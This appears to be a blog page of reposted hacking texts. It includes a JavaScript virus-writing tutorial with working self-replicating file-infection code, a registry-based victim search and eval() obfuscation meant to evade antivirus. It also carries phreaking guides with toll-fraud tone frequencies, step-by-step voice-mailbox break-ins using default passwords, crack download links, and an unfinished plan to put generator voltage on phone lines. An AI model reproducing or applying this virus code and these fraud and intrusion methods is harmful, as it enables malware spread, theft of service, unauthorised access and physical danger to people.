06 August 2011
for tracing every things
==================
www.indiatrace.com
===================
its working check it
it trace every things
===================
Trace Mobile Number
===================
===================
Trace Vehicle Number
===================
=================
Trace IP Address
=================
-----------------------
Trace Fixed Line Number
-----------------------
==============
Trace Pin Code
=============
--------------------
Trace Bulk SMS Sender
--------------------
--------------
Trace STD Code
--------------
More traces ...
05 August 2011
Useful things in JavaScript
*************************************************************
*************************************************************
************ ***********
************ Useful things in JavaScript ***********
************ by Second Part To Hell/[rRlf] ***********
************ ***********
*************************************************************
*************************************************************
.intro words
After writing articles about Encryption and Polymorphism in JavaScript I also
discovered some other things in JavaScript. But that techniques are to short to
write more articles about it, so I desided to write one containing all the things
I found out while discovering that language. So, here we are...
.index
1) EPO or middle infection in JavaScript
2) Searching for victims in the registry (Not for Win95|98|ME)
3) Encrypting commands
.EPO or middle infection in JavaScript
Entry-Point Obscuring is a neverseen technique in JavaScript, also it will be
hard to detect the virus inside the file and it will be even harder to desinfect
a file infected by an EPO JavaScript virus. But I think, that I have to explain the
technique for everybody. I wanna show you a normal file and a file infect by an EPO
virus:
Not infected sample: Infected sample:
_______________ _______________
| | | |
| commands | | Call to virus |
| | | |
| commands | | commands |
| | | |
| commands | | commands |
| | | |
| commands | | Virus |
|_______________| | |
| commands |
| |
| commands |
|_______________|
OK, what to do? First we have to search any .JS file. Than we want to write the virus
code to any line of the program. Sounds easy, but you forgot something: You can't
write your code to any place of the file, because the real program would be killed.
So, where to include the virus-code? A possible answere: Include your code before
any 'function' in the code. If you do so, the orginal host-file won't be destruct.
Another fact you have to think of is, thatyou have to search your virus-code in the
file, and not to copy the whole file (=viruscode+host code) to the new victim.
OK, now let's have a look at the example file.
- - - - - - - [EPO-example] - - - - - - -
virus()
function virus()
{
var fso=WScript.CreateObject("Scripting.FileSystemObject")
var myfile=fso.OpenTextFile(WScript.ScriptFullName)
var mycode=""; var line=String.fromCharCode(13)+String.fromCharCode(10)
for (i=0; i<500; i++)
{
code=myfile.ReadLine()
if (code=="function virus()")
{
for (j=1; j<31; j++) { mycode+=code+line; code=myfile.ReadLine() }
i=666;
}
}
var vicall=fso.OpenTextFile("victim.js").ReadAll()
var victim=fso.OpenTextFile("victim.js")
var vcode=""; var viccodes=""; vsearch="FUNCTION";
for (i=0; i> virus()
Guess what? That's t call to the virus-function. Without it, the file will be
infect, but the virus will never run. Because of that I thought, it's better
to include that line :D
>> function virus()
>> {
That's our function. Here starts the virus-code.
>> var fso=WScript.CreateObject("Scripting.FileSystemObject")
>> var myfile=fso.OpenTextFile(WScript.ScriptFullName)
'fso' is the FileSystemObject. Without that we won't be able to read or write
anything to a file. That means, it's a very important opject. And myfile is the
variable, which we opend our own file.
>> var mycode=""; var line=String.fromCharCode(13)+String.fromCharCode(10)
We set some variables: 'mycode' will contain the viruscode at the end of the
virus-run, and line contains chr(13)+chr(10). What's that, you may think?
That's the same as the 'enter'-key ;)
>> for (i=0; i<500; i++)
>> {
Next things will run 500 times (not really, because the 'for' will stopp after
the finish of reading from the victim-file.
>> code=myfile.ReadLine()
Does what it sounds like: now code is one line of our own file. We need it,
because we want to find our virus-code. (maybe now in the first generation, but
for sure in the next ones)
>> if (code=="function virus()")
>> {
If we found the first line of our code, let's do the next commands.
>> for (j=1; j<31; j++) { mycode+=code+line; code=myfile.ReadLine() }
The virus-code has 31 lines, because of that we have to read the 31st lines
we find after the start. Than we have the viruscode.
>> i=666;
>> }
>> }
This is a very ugly way to stopp a 'for', but my favorit one :). After that the
'for' ends and than the 'if'.
>> var vicall=fso.OpenTextFile("victim.js").ReadAll()
vicall=the whole code of the victim, that we want to infect. We need that because
we want to know the size of the victim.
>> var victim=fso.OpenTextFile("victim.js")
Now we open our victim again to read every letter for it's own., because we want wo
find a function.
>> var vcode=""; var viccodes=""; vsearch="FUNCTION";
That's three variables we need in our code. vcode be compain one byte every run of the
next 'for', viccode will contain the whole code of the victim before the function starts,
and vsearch contains the searchstring, that we need to compair with the string we found in
our victim.
>> for (i=0; i> {
Next things will run as often as our victim is long.
>> vcode=victim.Read(1);
We read one byte of the victimcode.
>> if (vcode.toUpperCase()=="F")
>> {
If the uppercase of the letter we read is "F", we do the next things (maybe we found a
function?! yahuu :D )
>> for (j=1; j<8; j++) { vcode+=victim.Read(1); if (vcode.toUpperCase() !=vsearch.substring(0,j+1)) { j=666 }; i++; }
We read 8 more letters (F=1, U=2, N=3, ...). If that string we found is not the string we're
searching for, we stopp to read more letters this time ('j=666'=close the for in my favorit way.
Than we add 1 to i, otherwise there would be a 'Read After EOF'-Error.
>> }
Close our important 'if'.
>> if (vcode.toUpperCase()==vsearch) { i=vicall.lenght+666 }
now let's compair, if the whole string we read ('F'+7 other letters) is the thing we're
searching for ('FUNCTION'). If yes, we stop to search functions, because we already found
one... ;)
>> if (vcode.toUpperCase()!=vsearch) { viccodes+=vcode }
If the things aren't the same, we copy the 8 letters to our start of the victim-code,
because we'll need them in the end of the code.
>> }
End of the "searching after functions"-'for'.
>> virinc=fso.OpenTextFile("victim.js", 2).Write("virus()"+line+viccodes+line+mycode+line+"function"+victim.ReadAll())
We open the victim again to write into it (look at the '2'). Than we write into it a
call to our virus-function ('virus()'). Then we'll add a blank-line, than the victim-code
before the function, than again a blank-line, than our virus code, than once more a
blank-line, than the string "function" (because we didn't add it to any variable), than
the rest of the victim-code. Here we have it... our infect file ;)
>> victim.Close();
Let's close te victim-file.
>> }
And end of our virus function.
- - - - - - - [end of EPO-example-explanation] - - - - - - -
.Searching for victims in the registry (Not for Win95|98|ME)
At least every JavaScript virus (not worm!) searchs for files in the current directory and
sometimes also in Windows-, System- or Temp-directorys. But I'm sure, that no user will
execute a file in the system or temp-directory. Because of that I thought, I have to find
an other way to find victim, and suddenly the Registry came to my mind. OK, now let's
search files from registry. Now we have to know the key, where we can find the files.
And here is it:
- - - - - - - - [registry-key for JavaScript files] - - - - - - - - -
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU\\js\\MRUList
- - - - - - - [end of registry-key for JavaScript files] - - - - - - -
Now we have a list of some JavaScript-files. For instance that:
- - - - - - - [registry-key list] - - - - - - -
(standart) REG_SZ (no value)
a REG_SZ C:\Windows\victim.js
b REG_SZ C:\Files\JavaScripts\work.js
c REG_SZ D:\Games\Race-Game\runme.js
d REG_SZ C:\My Shared Docs\flowers.js
MRUList REG_SZ dcab
- - - - - [end of registry-key list] - - - - - -
Our list contains four files, but it's also possible, that there are ten samples.
OK, but how do we know, how many files there are? We want to infect every of this
files, but if we try to read a key, that doesn't exist, there will be an error.
So what to do? Let's look at the 'MRUList'. It's value contains every key, which
contains a file. What do do with it? We have to read the whole 'MRUList' value,
than we read every key, which is in the 'MRUList'. Dadaaa... we have all files ;)
Maybe you don't really understand, what I mean, because of that You will find an
example.
- - - - - - - [registry-key example] - - - - - - - - - -
var fso=WScript.CreateObject("Scripting.FileSystemObject")
var shell=WScript.CreateObject("WScript.Shell")
MRU="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU\\js\\"
MRUList=shell.RegRead(MRU+"MRUList")
for (i=1; i<=MRUList.length; i++)
{
victim=shell.RegRead(MRU+MRUList.substring(i-1,i))
if (fso.FileExists(victim))
{
WScript.Echo(victim)
}
}
- - - - - - - [end of registry-key example] - - - - - - -
That example makes a MessageBox for every file, which is in that key, and that exists
at the computer (because it's able, that there is a file-name in the registry and it
doesn't exist at the computer anymore), because we don't want to have a "File not found"
error. Now you'll find an exact explanation of the example.
- - - - - - - [explanation of registry-key example] - - - - - - - - - -
>> var fso=WScript.CreateObject("Scripting.FileSystemObject")
>> var shell=WScript.CreateObject("WScript.Shell")
This are two variables, which are used for reading from the registry (shell) and
for checking if the file exists (fso).
>> MRU="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU\\js\\"
The variable with the key for the registry. I wrote it to a variable, otherwise
the program will be bigger, because I've to use this key two times.
>> MRUList=shell.RegRead(MRU+"MRUList")
This variable is the content of the 'MRUList'. In our example it was 'dcba'.
I'll use it to check, how many entries are in the key.
>> for (i=1; i<=MRUList.length; i++)
>> {
The next things will run as often, as long MRUList is (in our example 4 Bytes=
4 times). I used this, because we know, as many letters are in MRUList, as many
entrys are in the key.
>> victim=shell.RegRead(MRU+MRUList.substring(i-1,i))
Variable 'victim' is one letter of the content from MRUList. For instands first run
i=1: i-1,i: 1-1,1: 0,1: we read everything from letter zero to letter one (= the first
letter in the content). :)
>> if (fso.FileExists(victim))
>> {
Let's check, if the file already exist on the computer. If yes, we'll do the next
things. If not, we won't do it. If the file exists, 'fso.FileExists(victim)' will
return the value 1. And that's 'TRUE'. Else it will return the value 0 (='FALSE').
I think, you got the point.
>> WScript.Echo(victim)
After finding key, which contains the filename, finding the the filename and checking
if the file exists, we're making a messagebox to write the filename. If you use this
technique for a virus, you have to include your file-infection code here. But I thought,
that i don't have to include a virus-body. :)
>> }
>> }
The last part in the example is the end of the 'if', which checked, if the file exists
and the end of the 'for', which run as often as much files exists.
- - - - - - - [end of explanation ofregistry-key example] - - - - - - -
.Encrypting commands
While writing an article about JavaScript string encryption, I had no idea how to encrypt
the commands, also they are as important as the strings. After reading some things about
JavaScript, the idea came to my mind. And it's a very nice one. The princip after the whole
idea is the command 'eval()'. The command run strings. :) Let's have a look at the command.
- - - - - - - ['eval()' example] - - - - - - -
eval('WScript.Echo("Any silly message")')
- - - - - - [end of 'eval()' example] - - - - -
You got the point? The only thing we have to do is to encrypt the command in the same was as
a string, and set it to the command. This could be very important, because for instands
Norton AV's Script-Checker Heuristic will detect a virus, which creates a simple file.
Now let's look at a encrypt example. The example only generats a new file named 'eval.txt'.
As you will see, this is only a little encrypt, but Norton Script Checker don't detect anything :)
- - - - - - ['eval()' encryption example] - - - - - - -
var ene="e"
var eni="i"
eval('WScr'+eni+'pt.Cr'+ene+'at'+ene+'Object("Scripting.FileSystemObject").Cr'+ene+'at'+ene+'T'+ene+'xtF'+eni+'l'+ene+'("eval.txt")')
- - - - - [end of 'eval()' encryption example] - - - - -
.last words
I think, that these techniques are very useful, if you want to make a JavaScript virus. And I'm
sure, that AV's will have problems to desinfect a virus useing my EPO technique, of detect a virus,
wich is 100% encrypt with the 'eval()' technique. And I'm sure, that spreading the virus ALSO (not
only) with that registry technique will be much more successfull than don't use it.
My goal is to fool AVs with techniques, which are hard to detect or desinfect. And I think, this time
I was successful in doing that. :)
04 August 2011
for software download
========================
for software download
=========================
http://down.cd/
http://www.download.com/Active-WebCam/3000-2348_4-10352321.html?part=rubics.1&subj=2&tag=2697
http://www.baazee.com/static/Computers_Peripherals.html?MarketMedId=2948
http://www.soft411.com/
http://www.handyarchive.com/free/white/
http://www.dirfile.com/
http://www.cctvsentry.com/
http://www.soft411.com/software/neunet.html
http://www.crackspider.net/?freeseri
http://www.winpicks.com/SoftwareDownload.asp?dlid=24647
wallpapers sites
================
wallpapers sites
================
http://www.clipaholic.com/religion.html
http://www.mpphoto4you.com/
http://www.tucows.com/downloads/Windows/DesktopEnhancements/ScreenSavers/Nature/Flowers/
http://www.morningstarphoto.com/
http://www.wallpaperwholesaler.com/
http://www.aim-dtp.net/
http://www.allposters.com/gallery.asp?aid=972760&item=140885
http://www.animationfactory.com/
http://www.animationlibrary.com/a-l/
http://coolwallpaper.com/
http://www.fileedge.com/get/love
http://www.mikebonnell.com/wallpaper.html
http://www.jindalphoto.com/photogal/photogallery.html
13 December 2010
Table of Contents
This is a compilation of Texts by Dysphunxion.. Most of it was
actually typed by me.. like the intro.. the boxes explained..
and the VMB Hacking.. the rest are just plans for boxes.. Some
may be on the older side but most still work!!!
Now on with the show...
Xx-x-x-x-x-x-x-x-x-x-x-xX
I Table of Contents I
Xx-x-x-x-x-x-x-x-x-x-x-xX
Introduction to hacking. . . . . . . . . . . . . . . . . . . . 1
Phone Phreaking. . . . . . . . . . . . . . . . . . . . . . . . 2
Basic Boxes Technically Explained . . . . . . . . . . . . 3
(BLUE,3);
(BLACK,4);
(CHEESE,5)
Voice mail box hacking. . . . . . . . . . . . . . . . . . 6
Blue Box Tones. . . . . . . . . . . . . . . . . . . . . . 9
Scarlet box . . . . . . . . . . . . . . . . . . . . . . . 10
Green Box . . . . . . . . . . . . . . . . . . . . . . . . 11
Blotto Box. . . . . . . . . . . . . . . . . . . . . . . . 12
Potpourri
Lunch Box . . . . . . . . . . . . . . . . . . . . . . . . 13
INTRODUCTION TO HACKING
Most people who have never hacked or are beginners think that
hackers are a small community of very knowledgeable computer
"geniuses" that randomly break into systems for fun and then
create havoc or steal information. I will speak of my own views
on hacking which shouldn't reflect the feelings of the entire
hacking community but I would guess a large amount. First of all
hacking is getting more and more risky everyday. Because of this,
hacking for fun isn't as safe as it used to be (although most of
my hacking is for fun). The reason people (people I know) hack is
because we believe in free information exchange. This means that
I should be able to freely access any information that is
available over the modem that I want. There are obvious reasons
why this can't be achieved, but if people have information that
is that sensitive then it should not be put out over the modem.
Now the second and biggest misconception about hacking is how the
hacker actually "hacks". Most people think that hacking is just
basically getting lucky and guessing a password that lets you
into a system. This is *very* untrue. Let us take an example that
you have just broken into the CIA's computer system. So suddenly
you get a -> prompt. Now what do you do?!? This is the difference
between the hacker and some kid that is good at guessing. The kid
may be able to guess a password, but if he doesn't know what to
do once he's in then he might as well have not even hacked the
password at all. So, the main objective of the hacker is to
concentrate on learning how to use a system. After he has done
that then he can figure out ways to get around certain kinds of
security and get to the stuff he wants. So what you should do is
read all the manual's and text files that you can get your hands
on. Because before you can defeat a system, you must know how it
works (this works for life in general). Ok, now you understand
what hacking is and how you should go about learning it.
Phone Hacking
Basic Boxes Technically Explained
BLUE
The "Blue Box" was so named because of the color of the first
one found. The design and hardware used in the Blue Box is fairly
sophisticated, and its size varies from a large piece of
equipment to the size of a pack of cigarettes. The Blue Box
contains 12 or 13 buttons or switches that emit multi-frequency
tones characteristic of the tones used in the normal operation of
the telephone toll (long distance) switching network. The Blue
Box enables the user to place free long distance calls by
circumventing toll billing equipment. The Blue Box may be
directly connected to a phone line, or it may be acoustically
coupled to a telephone handset by placing the Blue Box's speaker
next to the transmitter or the telephone handset. To understand
the nature of a fraudulent Blue Box call, it is necessary to
understand the basic operation of the Direct Distance Dialing
(DDD) telephone network. When a DDD call is properly originated,
the calling number is identified as an integral part of
establishing the connection. This may be done either
automatically or, in some cases, by an operator asking the
calling party for his telephone number. This information is
entered on a tape in the Automatic Message Accounting (AMA)
office. This tape also contains the number assigned to the trunk
line over which the call is to be sent. The information relating
to the call contained on the tape includes: called number
identification, time of origination of call, and info that the
called number answered the call and time of disconnect at the end
of the call. Although the tape contains info with respect to many
different calls, the various data entries with respect to a
single call are eventually correlated to provide billing info for
use by your Bell's accounting department. The typical Blue Box
user usually dials a number that will route the call into the
telephone network without charge. For example, the user will very
often call a well-known INWATS (toll-free) customer's number. The
Blue Box user, after gaining this access to the network and, in
effect, "seizing" control and complete dominion over the line,
operates a key on the Blue Box which emits a 2600 Hertz (cycles
per second) tone. This tone causes the switching equipment to
release the connection to the INWATS customer's line. The 2600Hz
tone is a signal that the calling party has hung up. The Blue Box
simulates this condition. However, in fact the local trunk on the
calling party's end is still connected to the toll network. The
Blue Box user now operates the "KP" (Key Pulse) key on the Blue
Box to notify the toll switching equipment that switching signals
are about to be emitted. The user then pushes the "number"
buttons on the Blue Box corresponding to the telephone # being
called. After doing so he/she uses the "ST" (Start) key to tell
the switching equipment that signalling is complete. If the call
is completed, only the portion of the original call prior to the
'blast' of 2600Hz tone is recorded on the AMA tape. The tones
emitted by the Blue Box are not recorded on the AMA tape.
Therefore, because the original call to the INWATS # is toll-
free, no billing is rendered in connection with the call.
Although the above is a description of a typical Blue Box call
using a common way of getting into the network, the operation of
a Blue Box may vary in any one or all of the following respects:
The Blue Box may include a rotary dial to apply the 2600Hz tone
and the switching signals. This type of Blue Box is called a
"dial pulser" or "rotary SF" Blue box. Getting into the DDD toll
network may be done by calling any other toll-free # such as
Universal Directory ASSistance (555-1212) or any number in the
INWATS network, either inter-state or intra-state, working or
non-working. Entrance into the DDD toll network may also be in
the form of "short haul" calling. A "short haul" call is a call
to any # which will result in a lesser amount of toll charges
than the charges for the call to be completed by the Blue Box.
For example, a call to Birmingham from Atlanta may cost $.80 for
the first 3 minutes while a call from Atlanta to Los Angeles is
$1.85 for 3 minutes. Thus, a short haul, 3-minute call to
Birmingham from Atlanta, switched by use of a Blue Box to Los
Angeles, would result in a net fraud of $1.05 for a 3 minute
call. A Blue Box may be wired into the telephone line or
acoustically coupled by placing the speaker of the Blue Box near
the transmitter of the phone handset. The Blue Box may even be
built inside a regular Touch-Tone phone, using the phone's push-
buttons for the Blue Box's signalling tones. A magnetic tape
recording may be used to record the Blue Box tones for certain
phone numbers. This way, it's less conspicuous to use since you
just make it look like a walkman or whatever, instead of a box.
All Blue Boxes, except "dial pulse" or "Rotary SF" Blue Boxes,
must have the following 4 common operating capabilities:
It must have signalling capability in the form of a 2600Hz tone.
This tone is used by the toll network to indicate, either by its
presence or its absence, an "on hook" (idle) or "off hook" (busy)
condition of the trunk. The Blue Box must have a "KP" tones that
unlocks or readies the multi-frequency receiver at the called end
to receive the tones corresponding to the called phone #. The
typical Blue Box must be able to emit M tones which are used to
transmit phone #'s over the toll network. Each digit of a phone #
is represented by a combination of 2 tones. For example, the
digit 2 is transmitted by a combination of 700Hz and 1100Hz. The
Blue Box must have an "ST" key which consists of a combination of
2 tones that tell the equipment at the called end that all digits
have been sent and that the equipment should start switching the
call to the called number.
BLACK
This Box was named because of the color of the first one
found. It varies in size and usually has one or two switches or
buttons. Attached to the telephone line of a called party, the
Black Box provides toll-free calling *to* that party's line. A
Black Box user tells other people beforehand that they will not
be charged for any call placed to him. The user then operates the
device causing a "non-charge" condition ("no answer" or
"disconnect") to be recorded on the telephone company's billing
equipment. A Black Box is relatively simple to construct and is
much less sophisticated than a Blue Box. NOTE: This will not work
on any type of Electronic Switching Systems, (ESS, DMS100 etc.)
CHEESE
This Box was named after the container in which the first one was
found. Its design may be crude or very sophisticated. Its size
varies; one was found the size of a half-dollar. A Cheese Box was
used most often by bookmakers or betters to place wagers without
detection from a remote location. The device inter-connects 2
phone lines, each having different #'s but each terminating at
the same location. In effect, there are 2 phones at the same
location which are linked together through a Cheese Box. It is
usually found in an unoccupied apartment connected to a phone
jack or connecting block. The bookmaker, at some remote location,
dials one of the numbers and stays on the line. Various bettors
dial the other number but are automatically connected with the
book maker by means of the Cheese Box interconnection. If, in
addition to a cheese box, a Black Box is included in the
arrangement, the combined equipment would permit toll-free
calling on either line to the other line. If a police raid were
conducted at the terminating point of the conversations -the
location of the Cheese Box- there would be no evidence of
gambling activity. This device is sometimes difficult to
identify. Law enforcement officials have been advised that when
unusual devices are found associated with telephone connections
the phone company security representatives should be contacted to
assist in identification.
(This probably would be good for a BBS, especially with the Black
Box set up. and if you ever decided to take the board down, you
wouldn't have to change your phone #. It also makes it so you
yourself cannot be traced. I am not sure about calling out from
one though.)
VOICE MAIL BOX HACKING
Hello again, and welcome to another œegions “f œucifer text file!
This text file has to do with hacking and scanning VMBs. The
reason I am writing this file is because I am very good at it,
and have had years of experience. In fact I have been called by
MCI for screwing them over by attacking and taking over a whole
damn system with a few friends of mine. Anyway, hacking VMBs is
very simple and basically safe, and not only that but they are
cool to have around. You can give them to friends, you can trade
them for access on bulletin boards, or you can use it for
yourself. As for this 'Tutorial on Hacking VMBs', we will be
talking about what systems to hack, how you go about hacking
them, default passwords, hints on better scanning, and having
your very own box.
VMB, in case you don't know, stands for 'Voice Mail Box'. Now a
VMB is like an answering machine. You can use it for all sorts of
things. Most VMB systems are dialed though 800 numbers. People
call up the VMB system that you have a box on, and dial in your
box number and then leave you a message. Whenever you want to
check your box, you just call up, enter your password and read
your messages. Inside a VMB you can do whatever, you can leave
messages to others on the system, you can change your 'Out Going'
message, you can have guest boxes (Explained later), you can have
the box call your house when you get an Urgent message, you can
do a lot of things. In fact, on some systems you can even CALL
OUT through them, so they can be used as a code of sorts! They
are cool to have.
You should scan/hack out Virgin Systems, this is another way of
calling a system that hasn't been hack out yet. Also, CINDI
Systems and ASPEN Systems have the best boxes and the most
options that VMB Systems can offer. I will be talking about ASPEN
System today since I know most about those.
Okay once you've found your Virgin VMB System, you start to scan.
Just incase you don't know what scanning is, that means you
search for boxes that are hackable (Explained later on). Now you
dial up the system and when it picks up and the bitch starts to
talk, press the "#" key. It will then ask you for your box
number... now there are two different way the ASPEN System can be
configured: 1) a "3 Digit Box Number System" or 2) a "4 Digital
Box Number System". Now lets just say this system is a 3 Digit
System. Okay, when it asks for your Box Number, enter in 999, now
it will say one of three things: [These are known as 'Greeting
Names']
1. John Doe [Box owners name]
2. "Box Number 999 Is Not a Valid Box Number"
3. "Box Number 999"
Now, if it either says 1 or 2, go to box number
998...997...996...995..etc, but if it says 3, then you are lucky,
now it will ask you for your password, now you are probably
saying 'Oh no this is where it gets difficult'... well you are
WRONG! This part is easy. Here is a list of ASPEN Default
Passwords:
* We will use box number 666 as an example box #
[ BN = Box Number ]
List of Default Password: Combination Result
1-BN 1666
BN+1 667
0-BN 0666
BN-0 6660
Most Common Äį BN 666
Now enter in a those defaults, try JUST the Box Number first,
ASPENs usually use that most. Now, if you try all those Defaults
and still can not get into that Voice Mail Box, then that means
that the box has been already taken, but the owner hasn't changed
his 'Generic Message', if you don't get in, you will just have to
search until you get in.
Okay, once you get your first box, *DO NOT* change anything!!
That will come later. Your first box is, as what is known as a
'Scanning Box'! What you do with your Scanning Box is this: You
enter "3" from the main commands menu, and it will ask you for
the box number. Now that command is the "Check for Receipt"
command, what it does it check Box #xxx for mail from you. This
command is very convenient for us VMB Hackers. To use that
command to your advantage, you enter in box a box number and it
will say 1 of the three 'Greeting Names', like before, if it say
#3, then you write down that Box Number and hack it later. But if
it says 1 or 2, then just keep scanning! All boxes with the
number 3 Greeting Name is known as a 'Hackable Box'. Now you keep
scanning until you have gone all the way down to Box number 000
or whatever is the lowest box it supports. Now, once you have
your list this is when all the fun starts! Now you are ready to
hack!
Hacking Out Your New Found 'Hackable' Boxes:
Okay this is the easy part. After you spent most of your time by
scanning the system you should be used to the system and how it
works, that should make hacking the ASPEN all the easier. Now, if
you had a 'Scanning Box', you should know what the default
password was for your Scanning Box. Well if the password for your
Scanning Box was just the Box Number, then *EVERY* other hackable
box should have the SAME default password. VMB Systems have only
one default password, If one box has the BN for a Default PW, the
all the others will too.
Okay, you call up the VMB System will the list of 'Hackable'
boxes by your side, and when the bitch is talking, press the "#"
key. When it asks you for your box number, enter in the first box
number on your list. When it asks for your password, enter in the
Default Password Sequence. Now if you don't get into that box,
it's not a problem, just keep going down your list. You should
get into a few. But remember, just because a box is marked
'Hackable', it doesn't mean you will definitely get into it.
Okay, now you have a few dozen boxes. You can now use you
Scanning Box to do whatever you please.
ASPEN Guest Boxes:
Once you have a box of your own, you can give out 'Guest Boxes'.
Guest Boxes are like Sub Boxes in your box. In ASPEN you have 4
of them. If you give out Guest Box #1 to John Doe, Mr. Doe can
call in, enter in the password YOU set for him, and leave you
messages, but not only that, you can leave messages to HIM! Which
means, if his is in New York, and you are in California, and
neither of you have codes to call each other, then you can leave
messages thru your 800 VMB. Here is a list and explanation of all
4 of the Guest Boxes:
0. Main Box - Your Voice Mail Box!
1. Guest Box #1 - Can Leave & Receive Messages
2. Guest Box #2 - Can Leave & Receive Messages
3. Home Box - Can Leave & Receive Messages
4. Secretary Box - Can Check How Many Messages You Have & Receive
Messages
Hints On Better Scanning:
A lot of people say hacking and scanning for VMBs is too damn
hard... well that's because they are going at it all wrong, they
probably read some lame piece of text file on Hacking VMBs that
was about 500 bytes long. Well, here is a small list of hints on
better scanning and hacking:
1. Do not use a Voice Mail Box hacking/scanning program (i.e.:
VMB v1.0, ASPEN v1.0, VMBHACK v2.3, etc..) 2. Do not hack in
random order (i.e.: B#999, 345, 810, etc) Always hack in order:
999, 998, 997, 996, 995...000. 3. Try to find out if it's virgin.
The newer the System, the better.
4. If you have a phone with memory dial, change one entry to the
number of the VMB System. 5. Don't hack the System Managers box
unless you really want to.
Ideas of Things To Do With Your Extra Boxes:
Well since you can have up to 500 extra Voice Mail Boxes, you
might not know what to do with them, here are a few ideas that
can help you out:
1. Give them to friends
2. Sell them to friends
3. Offer them to sysops for better access
4. Trade them for HSTs or whatever
5. Use them as a Voice Verifying line (So you don't have to give
out your real voice number to BBSs when you apply!)
Blue Box Tones
In this short section I will attempt to list some tones that Ma
Bell uses and what they are. Well here goes: Blue box
frequencies: 2600 hz - used to get on/off trunk tone matrix to
use after 2600 hz.
700: 1 : 2 : 4 : 7 : 11 :
900: + : 3 : 5 : 8 : 12 :
1100: + : + : 6 : 9 : KP :
1300: + : + : + : 10 : KP2 :
1500: + : + : + : + : ST :
900 :1100 :1300 :1500 : 1700 :
Use KP to start a call and ST (1500+1700) to stop. Use 2600 HZ to
disconnect. Red box freqs: 1700 hz and 2200 hz mixed together. A
nickel is 66 ms on (1 beep). A dime is 66ms on, 66ms off, 66ms on
(2 beeps) a quarter is 33ms on, 33ms off repeated 5 times. (Ms =
millisecond). For those of you who don't know, a red box
simulates money being put into a pay phone. You must put in some
money first though (the operator can tell if money was put in but
as to how much she lets the computer answer that. (Yeah for the
computer) TASI locking freq: TASI (time assignment speech
interpolation) is used on satellite trunks, and basically allows
more than one person to use a trunk by putting them on while the
other person isn't talking. Of course, you'd never hear the other
person talking on your trunk. When you start to talk, however,
the TASI controller has to find an open trunk for you. Because of
this, some of your speech is lost (because of the delay in
finding a trunk) this is called clipping. Well, if you were
transmitting data over a trunk, clipping would really mess up the
data. So there is something called a TASI locking frequency which
keeps the TASI from putting anyone else on your trunk or you on
anyone else's trunk. In any case the freq. is 1850 hz. (Sent
before the transmission). Have fun!!!
:%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%:
:% %:
:% THE GREEN BOX %:
:% %:
:%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%:
The Green Box generates useful tonessuch as COIN COLLECT, COIN RETURN, and
RINGBACK. These are the tones that ACTS or the TSPS operator would send to
the CO when appropriate. Unfortunately, the green box cannot be used at a
fortress station, but must be used by the CALLED party. The tones (hz) are:
COIN COLLECT 700 + 1100
COIN RETURN 1100 + 1700
RINGBACK 700 + 1700
Before the called party sends any of these tones, an operator released
signal should be sent to alert the MF detectors at the CO. This can be done
by sending 900 + 1500 Hz or a single 2600 Hz wink (90 ms) followed by a 60 ms
gap and then the appropriate signal for at least 900 ms. Also, do not forget
that the initial rate is collected shortly before the 3 minute period is up.
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-::-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:
:%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%:
:% %:
:% THE BLOTO BOX %:
:% %:
:%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%:
HOW TO BUILD A BLOTO BOX
Finally, it is here! What was first conceived as a joke to fool the inncoent
phreakers around America has finally been concieved by the one phreak who is
the expert on lines and voltage: The Traveler. Other boxes by the Traveler
include the White Gold Box, the Aqua Box, The Diverti Box, and the Cold Box.
All of those plans will soon be available in a BBS/AE near you!
Well, for you people who are unenlightened about the Blotto Box, here is a
brief summery of a legend.
--*-=> The Blotto Box <=-*--
For years now every pirate has dreamed of the Blotto Box. It was at first
made as a joke to mock more ignorant people into thinking that the function
of it actually was possible. Well, if you are The Voltage Master, it is
possible. Originally conceived by King Blotto of much fame, the Blotto Box is
finally available to the public.
NOTE: The Traveler can not be responcable for the information disclosed in
the file! This file is strictly for informational purposes and should not be
actually built and used! Usage of this electronical impulse machine could
have the severe results listed below and could result in high federal
prosecution!
Again, The Traveler
TAKES NO RESPONCABILITY!
All right, now that that is cleared up, here is the basis of the box and
it's function.
The Blotto Box is every phreaks dream... you could hold AT&T down on it's
knee's with this device. Because, quite simply, it can turn off the phone
lines everywhere. Nothing. Blotto. No calls will be allowed out of an area
code, and no calls will be allowed in. No calls can be made inside it for
that matter. As long as the switchhing system stays the same, this box will
not stop at a mere area code. It will stop at nothing. The electrical
impulses that emit from this box will open every line. Every line will ring
and ring and ring... the voltage will never be cut off until the box/
generator is stopped. This is no 200 volt job, here. We are talking
GENERATOR. Every phone line will continue to ring, and people close to the
box may be electricuted if they pick up the phone.
But, the Blotto Box can be stopped by merely cutting of the line or
generator. If they are cut off then nothing will emit any longer. It will
take a while for the box to calm back down again, but that is merely a
superficial aftereffect. Once again: Construction and use of this box is not
advised! The Blotto Box will continue as long as there is electricity to
continue with.
OK, that is what it does, now, here are some interesting things for you to
do with it...
--*-=> The Blotto Box Functions and Installation <=-*--
Once you have installed your Blotto, there is no turning back. The
following are the instructions for construction and use of this box. Please
read and heed all warnings in the above section before you attempt to
construct this box.
Materials:
- A Honda portable generator or a main power outlet like in a
stadium or some such place.
- A radio shack cord set for 400 volts that splices a female
plug into a phone line jack.
- A meter of voltage to attach to the box itself.
- A green base (i.e. one of the nice boxes about 3' by 4' that
you see around in your neighborhood. They are the main switch
boards and would be a more effective line to start with.
or: A regular phone jack (not your own, and not in your area code!
- A soudering iron and much souder.
- A remote control or long wooden pole.
Now. You must have guessed the construction from that. If not, here goes,
